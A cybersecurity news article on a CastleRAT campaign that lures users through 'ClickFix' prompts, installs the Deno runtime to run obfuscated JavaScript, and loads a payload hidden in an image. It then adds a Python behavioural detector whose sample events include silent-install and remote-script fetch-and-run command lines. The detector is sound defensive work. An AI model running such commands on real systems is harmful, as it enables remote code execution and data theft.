
This sophisticated attack chain bypasses traditional security measures, marking a significant leap in cybercriminal techniques.
The campaign uniquely exploits Deno, a popular, trusted runtime environment, to execute CastleRAT, a powerful remote access tool used for espionage and data theft.
This attack demonstrates how creative and stealthy modern malware campaigns have become, with attackers going to great lengths to avoid detection.
The “ClickFix” Social Engineering Trap and Deno Exploitation
The attack starts with a simple yet effective social engineering tactic called ClickFix, in which the victim is tricked into pasting a command into the Windows terminal to “fix” a browser error or CAPTCHA.
By bypassing traditional web security measures, the attackers cause the user to execute a command that silently downloads the malicious installer. This approach cleverly uses human error, making it harder to prevent and more likely to succeed.
Once the attacker has access to the system, instead of deploying malware immediately, they first install Deno, a legitimate and trusted runtime.
Antivirus software, typically configured to ignore Deno due to its digital signature, does not flag its installation.
This sets the stage for the next step: the attackers use Deno as a Trojan horse to execute obfuscated JavaScript.
Since Deno is a trusted process, the malware runs with elevated privileges, effectively bypassing traditional detection mechanisms.
Stealthy Execution and CastleRAT Payload Delivery
After the Deno runtime is established, the attackers further obscure their activity. The JavaScript code executed by Deno downloads a Python environment, cleverly disguised as Petuhon, and a JPEG image (CFBAT.jpg).
While the image seems harmless, it actually contains an encrypted CastleRAT payload. The Python script, protected by PyArmor, decodes the payload directly into memory using a technique known as reflective PE loading, meaning the malware never touches the disk.
This method evades file-scanning antivirus engines, making it virtually invisible to traditional security tools.
CastleRAT sends the collected data to a Command and Control (C2) server. The malware also uses low-level Windows APIs to perform keylogging, clipboard hijacking, and data exfiltration, targeting sensitive information such as cryptocurrency wallet files, browsing history, and developer credentials.
According to Threatdown research, to defend against such threats, organizations need to adopt behavioral monitoring and implement endpoint detection and response (EDR) tools.
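As an added illustration of the behavioral monitoring recommended above (example code written for this page, not part of the Threatdown research or the article), the following Python toy detector walks process ancestry over constructed Sysmon-style process-creation events and flags the chain described here: an installer launched from an interactive shell, Deno running a remote or fully-permitted script, and a Python interpreter spawned under Deno. All event values are constructed samples, and `example.invalid` is a placeholder host.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full executable path
    cmdline: str

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def _name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image names from the process up to the root, e.g. ['python.exe', 'deno.exe', ...]."""
    chain, cur = [], ev
    while cur is not None:
        chain.append(_name(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain

def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for events matching the Deno -> Python chain heuristics."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e, by_pid)
        name = chain[0]
        # Rule 1: an installer launched directly from a shell the user typed into (ClickFix pattern).
        if name == "msiexec.exe" and len(chain) > 1 and chain[1] in SHELLS:
            hits.append((e.pid, "installer launched from interactive shell"))
        # Rule 2: Deno executing a script fetched from a URL or granted all permissions (-A / --allow-all).
        if name == "deno.exe" and re.search(r"(-A\b|--allow-all|https?://)", e.cmdline):
            hits.append((e.pid, "deno executing remote or fully-permitted script"))
        # Rule 3: a Python interpreter whose ancestry includes Deno (the Deno -> Python hop).
        if name.startswith("python") and "deno.exe" in chain[1:]:
            hits.append((e.pid, "python spawned under deno"))
    return hits

# Constructed sample events (not taken from the incident); pids 700/800 are benign controls.
SAMPLE = [
    ProcEvent(100, 1,   r"c:\windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"c:\windows\system32\cmd.exe", r"cmd.exe /c msiexec /i %TEMP%\placeholder.msi /qn"),
    ProcEvent(300, 200, r"c:\windows\system32\msiexec.exe", r"msiexec /i %TEMP%\placeholder.msi /qn"),
    ProcEvent(400, 200, r"c:\users\u\.deno\bin\deno.exe", "deno run -A https://example.invalid/loader.js"),
    ProcEvent(500, 400, r"c:\users\u\appdata\local\temp\python.exe", "python.exe loader.py"),
    ProcEvent(700, 100, r"c:\users\u\.deno\bin\deno.exe", "deno run --allow-read main.ts"),
    ProcEvent(800, 100, r"c:\python312\python.exe", "python.exe script.py"),
]
```

Running `detect(SAMPLE)` yields one hit each for pids 300, 400 and 500 and none for the benign controls.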
This innovative attack underscores the need for evolving security strategies that go beyond traditional methods, focusing on detecting and responding to suspicious behavior, rather than relying solely on static defenses.
The post CastleRAT Exploits Deno Runtime To Bypass Enterprise Security appeared first on Cyber Security News.
